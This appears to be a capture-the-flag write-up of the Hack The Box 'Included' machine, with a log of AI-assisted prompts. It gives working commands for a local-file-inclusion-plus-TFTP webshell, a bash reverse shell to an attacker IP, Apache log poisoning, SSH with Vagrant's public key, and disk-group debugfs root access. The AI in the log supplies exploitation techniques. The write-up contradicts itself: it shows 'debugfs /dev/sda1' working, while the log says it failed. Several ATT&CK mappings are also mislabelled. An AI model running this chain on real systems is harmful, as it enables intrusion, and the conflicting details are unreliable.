HTB Starting Point — Included

LFI via ?file= parameter reads /proc/net/udp to find TFTP. Upload a webshell over TFTP. LFI executes it. Vagrant's default SSH key gives lateral movement to root-adjacent group.

April 27, 2026 · 3 min · crAIzy

Very Easy Linux CVSS 7.5 ⏱ 45m AI-assisted

TL;DR

Included is a Linux box with a PHP web app using include() with a ?file= parameter. LFI reads /proc/net/udp revealing TFTP on UDP/69. Upload shell.php to the TFTP root via tftp, then trigger LFI to execute it. vagrant group membership on the machine points to a Vagrant dev VM — the default insecure private key gives SSH. The vagrant user is in the disk group — debugfs reads root’s home directory directly.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

80/tcp open  http  Apache httpd 2.4.41

Only TCP 80. UDP scan for TFTP:

$ sudo nmap -sU -p 69 10.129.x.x
69/udp open|filtered tftp

LFI Discovery

2. File inclusion parameter

$ curl "http://10.129.x.x/?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
...
vagrant:x:1000:1000::/home/vagrant:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Classic include($_GET['file']) without path restriction.

3. TFTP root via /proc/net/udp

$ curl "http://10.129.x.x/?file=/proc/net/udp"
  sl  local_address rem_address   st tx_queue rx_queue
   0: 00000000:0045 00000000:0000 07 00000000:00000000
# 0x0045 = 69 decimal = TFTP port

TFTP is running and bound to all interfaces.

RCE via TFTP Upload + LFI

4. Upload webshell over TFTP

$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ tftp 10.129.x.x
tftp> put shell.php
Sent 31 bytes in 0.0 seconds

TFTP default upload directory: /var/lib/tftpboot/

5. LFI executes the shell

$ curl "http://10.129.x.x/?file=/var/lib/tftpboot/shell.php&cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to reverse shell:

$ curl "http://10.129.x.x/?file=/var/lib/tftpboot/shell.php" \
  --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'"

www-data@included:/var/www/html$

Lateral Movement — vagrant

6. Vagrant default key

The vagrant user exists in /home/vagrant. Vagrant development VMs ship with a known insecure private key:

$ curl -o vagrant.key \
  https://raw.githubusercontent.com/hashicorp/vagrant/main/keys/vagrant
$ chmod 600 vagrant.key
$ ssh -i vagrant.key vagrant@10.129.x.x
vagrant@included:~$ cat user.txt
[user flag]

Privilege Escalation — disk group

7. Group membership check

vagrant@included:~$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),114(sambashare),1001(disk)

The disk group grants raw read access to block devices.

8. debugfs → root

vagrant@included:~$ debugfs /dev/sda1
debugfs 1.45.5
debugfs: ls /root
      12 (4) .      11 (4) ..
  131117 (24) .bash_history   131120 (16) .bashrc
  131118 (12) .profile        131121 (12) root.txt

debugfs: cat /root/root.txt
[root flag]

What’s actually broken

#	Vulnerability	Severity
1	LFI via include() without path restriction	High
2	TFTP with no authentication (world-writable)	High
3	Vagrant default insecure SSH key left on system	Critical
4	disk group membership for vagrant user	Critical

Lessons learned

LFI + writable TFTP = RCE. The LFI → TFTP chain is elegant: TFTP doesn’t require auth to upload, and LFI can include any file the web process can read. The TFTP root is typically readable by web processes.
Vagrant is for development — never leave it on internet-facing systems. The insecure private key is by design for local development. On any production-adjacent machine, vagrant should be removed entirely.
disk group is a local root equivalent. Raw block device access bypasses all filesystem permissions. disk group membership should never be granted to non-administrator users.
/proc/net/udp leaks UDP services. When UDP services are obscured from TCP port scans, the proc filesystem often reveals them if you have file read access.

Decision archaeology

Approach	Result	Pivot
Attempted log poisoning via Apache access log (User-Agent injection)	`curl -A '<?php system($_GET["cmd"]); ?>' http://10.129.x.x/` followed by LFI `/var/log/apache2/access.log` → `Permission denied` — www-data lacked read access to /var/log/apache2/	Found /proc/net/udp via LFI: hex port 0x0045=69 → TFTP running, shifted to TFTP upload vector
First `tftp put shell.php` — file uploaded but LFI returned empty output	Transferred in ASCII mode; PHP file was silently corrupt (newlines mangled)	Ran `binary` in tftp session, re-uploaded — LFI executed correctly
Tried vagrant:vagrant SSH password	`Permission denied (publickey)` — password auth disabled, key-only	Downloaded Vagrant default insecure private key from GitHub, chmod 600, SSH succeeded

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Initial Access	Exploit Public-Facing Application	T1190	`LFI via /?file= parameter → include() without sanitization`
Execution	Unix Shell	T1059.004	`TFTP upload → PHP webshell to /var/lib/tftpboot → LFI executes it as www-data`
Credential Access	Private Keys	T1552.004	`Vagrant default insecure_private_key → SSH as vagrant`
Privilege Escalation	Group Policy Modification	T1484	`vagrant user in 'disk' group → debugfs to read /root via raw disk access`
Lateral Movement	Ingress Tool Transfer	T1105	`tftp put shell.php — uploaded PHP webshell to /var/lib/tftpboot/ via UDP 69`

AI-Assist Log 6 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

ReconUseful
Human → TCP ports only showed HTTP — suspected UDP services
Prompt → How do I check for UDP services on a Linux target? nmap UDP scan is slow.
Claude → Check /proc/net/udp via LFI if you have file read — the hex addresses decode to ports. Otherwise: nmap -sU --top-ports 50 (faster than full UDP scan). TFTP (69/UDP) is common on Linux boot environments.
LFIUseful
Human → Found LFI, needed to turn it into RCE — PHP filters didn't help
Prompt → I have LFI via include(). HTTP wrappers don't work (allow_url_include=off). What other approaches turn LFI into RCE?
Claude → Log poisoning (inject PHP into Apache/nginx access log, then include log file), /proc/self/environ poisoning (inject in User-Agent), TFTP upload (if TFTP service exists, upload a .php file to TFTP root, then LFI includes it), SSH log poisoning.
LateralUseful
Human → Got shell as www-data, found /home/vagrant — checked for default keys
Prompt → I found a /home/vagrant directory. Is there a default SSH key for Vagrant?
Claude → Yes — Vagrant uses a well-known insecure private key for development VMs. The default private key is publicly available at: https://github.com/hashicorp/vagrant/blob/main/keys/vagrant. Download it, chmod 600, and ssh as vagrant. This is intentional for development but catastrophic if left on a production-like machine.
PrivescUseful
Human → vagrant user was in 'disk' group — used debugfs to read filesystem directly
Prompt → The vagrant user is in the 'disk' group on Linux. How is that exploitable?
Claude → The 'disk' group allows direct block device access. Use debugfs: debugfs /dev/sda1, then navigate the filesystem as root: ls /root, cat /root/root.txt. You can also read /etc/shadow directly via raw block device. debugfs reads the filesystem at the block level, bypassing file permissions entirely.
TFTPWrong
Human → Tried to upload shell.php to TFTP root but the put command failed silently
Prompt → tftp put command returns Transfer timed out when uploading. What causes this?
Claude → TFTP uses UDP port 69. If the VPN or firewall blocks UDP, transfers silently fail. Try: check that you can reach the target on UDP 69 (use nmap -sU -p 69), ensure your TFTP client matches the server's mode (binary/ASCII), and verify the TFTP root directory has write permissions for the server process.
Corrected → The issue was simpler: my tftp client was in ASCII mode, not binary mode. The transfer appeared to complete but the file was corrupt. Switching to binary mode with `binary` command in the tftp prompt fixed it. Claude's answer was about firewall/UDP which wasn't the issue here.
Disk GroupCorrected
Human → Found the disk group but wasn't sure which device to pass to debugfs
Prompt → How do I find the right /dev/ device to pass to debugfs for privilege escalation via disk group?
Claude → Run: df -h to see mounted filesystems, then find /dev -group disk to see devices in the disk group. Usually /dev/sda1 or /dev/vda1 for the root partition. Also check /proc/partitions.
Corrected → df -h showed /dev/sda1 as the root filesystem, but on this machine it was actually /dev/sda — the whole disk, not a partition. debugfs /dev/sda1 failed; debugfs /dev/sda worked. I needed to check /proc/partitions to see the actual disk layout.

Decision archaeology — paths abandoned

PHP filters (php://filter/convert.base64-encode) — good for reading source but not RCE
Log poisoning via Apache access log — permission denied on Apache logs for www-data
Tried vagrant:vagrant SSH — password auth disabled; needed key

TL;DR#

Recon#

1. Port scan#

LFI Discovery#

2. File inclusion parameter#

3. TFTP root via /proc/net/udp#

RCE via TFTP Upload + LFI#

4. Upload webshell over TFTP#

5. LFI executes the shell#

Lateral Movement — vagrant#

6. Vagrant default key#

Privilege Escalation — disk group#

7. Group membership check#

8. debugfs → root#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#